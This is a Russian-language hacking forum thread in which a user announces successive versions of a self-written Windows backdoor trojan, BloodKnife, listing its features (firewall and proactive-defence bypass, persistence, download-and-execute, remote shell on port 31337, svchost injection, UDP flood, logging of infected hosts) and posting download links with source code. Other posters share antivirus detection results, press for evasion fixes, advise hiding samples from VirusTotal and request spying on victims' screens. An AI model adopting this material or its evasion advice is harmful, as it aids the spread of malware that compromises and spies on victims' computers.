Вот, наконец то появилось время дописать. Итак, описание:

1)Есть какой-никакой обход фаеров(переписаный _dkcs_ddos_bot`овский).
2)SDT restore(обход проактивок).
3)Инжектом опять не получилось.
4)Копируется в системную диру, пишется в автозагрузку.

Функции:
1)Отправка месаги юзеру.
2)просмотр содержимого файла.
3)Download && Execute.
4)Открыть\закрыть cd-rom.
5)Разные игры с панелькой винды, нажатие кнопки пуск.
6)Выполнение команд в cmd.
7)UDP Flood(!).
8)Выключение виря.


Правда вес подкачал - 60кб. Управляется через клиент. Ну, думаю такому монстру нужно дать имя. Назвал BloodKnife. Думаю сделать web-админку. Но это в лучше случае осенью. Ну и самое главное - с исходниками!

Скачать:
http://lordofring.tushino.com/BloodKnife_v1.0.rar
http://softz.ifolder.ru/2420331
http://http://rapidshare.com/files/38282705/BloodKnife_v1.0.rar.html



[update]
Версия 1.4
+Добавлен отстук по стату. IP заражённых компов пишется в лог.
http://lordofring.tushino.com/BloodKnife.v.1.4.rar - c исходниками
________________________
Версия 1.3
+bindshell на 31337 порту
+вес 16кб.
+инжект в svchost.exe
+меньше палева
+функции все теже, клиент юзать тотже.
http://lordofring.tushino.com/BK.v.1.3.rar

Палиться твой вирус нодом при скачивании.
Кстати, тебе удалось запустить dkcs_ddos_bot ??

Удавалось. Но работает он криво. Инжект не пашет.В некоторые функции вызываю переполнение буфера. Биндшелл пашет, но тяжело и там в коде goto .illusion_bot в 100 раз лучше.

Ky3bMu4 а можно кинуть на virustotal ?

Делайте что хотите. Если запалите(каспером пока вроде не палится ), но вам же хуже.;)

Да я знаю каспер не палит у него с обнавлениями проблемы!!!

Списбо тебе Ky3bMu4 жду новые версии!!!

Ky3bMu4 смотри сколько антивирей палят!

AhnLab-V3 2007.6.20.1 06.20.2007 no virus found
AntiVir 7.4.0.34 06.20.2007 no virus found
Authentium 4.93.8 06.19.2007 W32/Backdoor.XXS
Avast 4.7.997.0 06.20.2007 Win32:Ircbot-AHP
AVG 7.5.0.467 06.19.2007 no virus found
BitDefender 7.2 06.20.2007 no virus found
CAT-QuickHeal 9.00 06.19.2007 no virus found
ClamAV devel-20070416 06.20.2007 no virus found
DrWeb 4.33 06.20.2007 DLOADER.Trojan packed by BINARYRES
eSafe 7.0.15.0 06.19.2007 no virus found
eTrust-Vet 30.7.3727 06.19.2007 no virus found
Ewido 4.0 06.19.2007 no virus found
FileAdvisor 1 06.20.2007 no virus found
Fortinet 2.91.0.0 06.20.2007 no virus found
F-Prot 4.3.2.48 06.19.2007 W32/Backdoor.XXS
F-Secure 6.70.13030.0 06.20.2007 no virus found
Ikarus T3.1.1.8 06.20.2007 no virus found
Kaspersky 4.0.2.24 06.20.2007 no virus found
McAfee 5056 06.19.2007 no virus found
Microsoft 1.2607 06.19.2007 Trojan:Win32/AgentBypass.gen!A
NOD32v2 2341 06.20.2007 probably unknown NewHeur_PE virus
Norman 5.80.02 06.19.2007 no virus found
Panda 9.0.0.4 06.20.2007 Suspicious file
Sophos 4.18.0 06.12.2007 no virus found
Sunbelt 2.2.907.0 06.16.2007 no virus found
Symantec 10 06.20.2007 Backdoor.IRC.Bot
TheHacker 6.1.6.136 06.20.2007 no virus found
VBA32 3.12.0.2 06.20.2007 suspected of Embedded.Trojan.DownLoader.12049
VirusBuster 4.3.23:9 06.19.2007 no virus found
Webwasher-Gateway 6.0.1 06.20.2007 no virus found

сможешь исправить?

W32/Backdoor.XXS а что это значит? типа XSS'ка на удаленном компе? о_О

Это версия бекдора :\ антивирусники так его обозначили

Ну вот, уже версия 1.1
+Добавлен bindshell на 31337`атом порту(через telnet).
+Вес сокращён до 56кб.
Клиент юзать тот же.

Скачать:
http://lordofring.tushino.com/BK1.1.rar

Молодец чувак=)

Много кода я нашел из dkcs бота=\

Sdt - не мой , обход фаера(там где шелкод) , UDP flood.

Ky3bMu4 а ты че новую версию не вложил клиент?

Так удобнее!Просто на заметку!

Проверил новую версию его творения так же те самые антивири палят его!!!
Ky3bMu4 надо бы исправить а?

А вот и версия 1.2
+Меньше палева.
+Я таки сделал инжект в svchost!

http://lordofring.tushino.com/BKv.1.2.rar - вместе с исходниками новых функций.

P.S.
я смотрю народу вирь не понравился...[хнык-хнык]

Ky3bMu4 народу непонравился дизайн наверное!

Попробуй даработать а ту очень простой и некрасивый!

Ky3bMu4 ты че еще лучше сделал!
Теперь больше антивирей плят!

Исправляй!

vii

Рас тебе надо то и исправляй сам благо исходники есть.

А Ky3bMu4 может щяс другим занят. И если он перестанет палится то это на неделю максимум!

Версия 1.3
+вес сокращён до 16кб.
http://lordofring.tushino.com/BK.v.1.3.rar

Ky3bMu4, спалился DrWeb - DLOADER.Trojan ((

Исправляй!

Вы меньше проверьте на VIRUSTOTAL_е, и все будет ништьяк !!!!
блин, ЗАПОНМИТЕ - когда вы что-то проверите, там проверяется роботом, а потом если что-то не то, или какой то антивир косяк показал, то тот сигнатура уже опубликуется и все антивирусы обнавляются (через ихний лабораториях).
и по этому через день или два - даже самый конченный антивирус будет палить !
Просто если проверяйте - потом обязательно меняйте сигнатуру и все.

Ky3bMu4 блин у меня похоже непошел твой трой!(версия 1.2 была!)
Хотел на себе испытать и бац комп перезагрузился!
У меня win xp sp2!

может кто нить обьяснит как он работает ?

Вот, наконец то появилось время дописать. Итак, описание:

1)Есть какой-никакой обход фаеров(переписаный _dkcs_ddos_bot`овский).
2)SDT restore(обход проактивок).
3)Копируется в системную диру, пишется в автозагрузку.

Функции:
1)Отправка месаги юзеру.
2)просмотр содержимого файла.
3)Download && Execute.
4)Открыть\закрыть cd-rom.
5)Разные игры с панелькой винды, нажатие кнопки пуск.
6)Выполнение команд в cmd.
7)UDP Flood(!).
8)Выключение виря.


Еще вопросы есть? А КАК именно он работает, смотри в исходниках.

Версия 1.4
+Добавлен отстук по стату. IP заражённых компов пишется в лог.
http://lordofring.tushino.com/BloodKnife.v.1.4.rar - c исходниками

Версия 1.4
+Добавлен отстук по стату. IP заражённых компов пишется в лог.
http://lordofring.tushino.com/public_html/BloodKnife.v.1.4.rar - c исходниками
Not Found
The requested URL /public_html/BloodKnife.v.1.4.rar was not found on this server.

Apache/1.3.31 Server at lordofring.tushino.com Port 80

public_html/ в адресе убери иполучишь что ишешь.

+Добавлен конфигуратор.

http://rapidshare.com/files/41581223/configur_bloodrnife.rar.html - исходники конфигуратора там же.

Сделай пожалуйста чтобы можно было делать скрины экрана жертвы.

Немного переделал...
Думаю разницу заметите как только скачаете...

_http://www.rapidshare.ru/338203
_http://slil.ru/24608784
_http://webfile.ru/1463691

Немного переделал...
Думаю разницу заметите как только скачаете...

_http://www.rapidshare.ru/338203
_http://slil.ru/24608784
_http://webfile.ru/1463691
Объясни пожалуйста как запустить этот файл? Он в формате .safe

Mosvit ... убери .safe =\

Убрал, что дальше? Я включил его, появилось какое-то окно с 3-ми полями, нажал Build появился файл Build ( я так понял это сервер) , а где клиент?

Кузьмич, перестань хулиганить!!! Отнимите у него ноутбук!

Свяжитесь со мной пожалуйста по аське по поводу этого бэкдора, что-то я ни как не могу с ним разобраться. (icq 4----0----0---7---0---4---7---0---3)